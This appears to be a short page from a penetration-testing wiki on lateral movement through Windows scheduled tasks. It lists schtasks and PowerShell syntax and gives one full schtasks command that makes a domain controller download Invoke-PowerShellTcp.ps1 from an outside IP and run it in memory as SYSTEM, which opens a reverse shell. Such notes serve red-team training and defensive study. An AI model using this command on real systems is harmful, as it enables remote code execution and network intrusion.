Windows Task Scheduler

Overview

To perform lateral movement using scheduled tasks, an attacker would typically use a compromised user account to schedule a task on a remote system. This task would then execute code or commands that would allow the attacker to move laterally across the network, escalate privileges, or access sensitive data.

Creating a scheduled tasks on a remote machine

Using New-ScheduledTask

New-ScheduledTask -ComputerName <computername> -Action <action> -Trigger <trigger> -Principal <principal> -Settings <settings> -Description <description> -TaskName <taskname> -Force

Using schtasks

Create / edit a Scheduled Job/Task. The job can be created on the local or a remote computer.

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.100.1:8080/Invoke-PowerShellTcp.ps1''')'"

Arguments

Parameter
Description

/S system

Remote system (default is local)

/SC schedule

The schedule frequency: Minute, Hourly, Daily, Weekly, Monthly, Once, Onstart,Onlogon,Onidle.

[/RU username [/RP password]]

Run job as this user.

/TN taskname

A name which uniquely identifies the scheduled task.

/TR taskrun

Pathname of the executable to run.

Execute remote task

Invoke-Command -ComputerName <computername> -ScriptBlock {schtasks /run /TN <taskname>}

Reference

PreviousKerberos double hopingNextLinux Lateral Movement

Last updated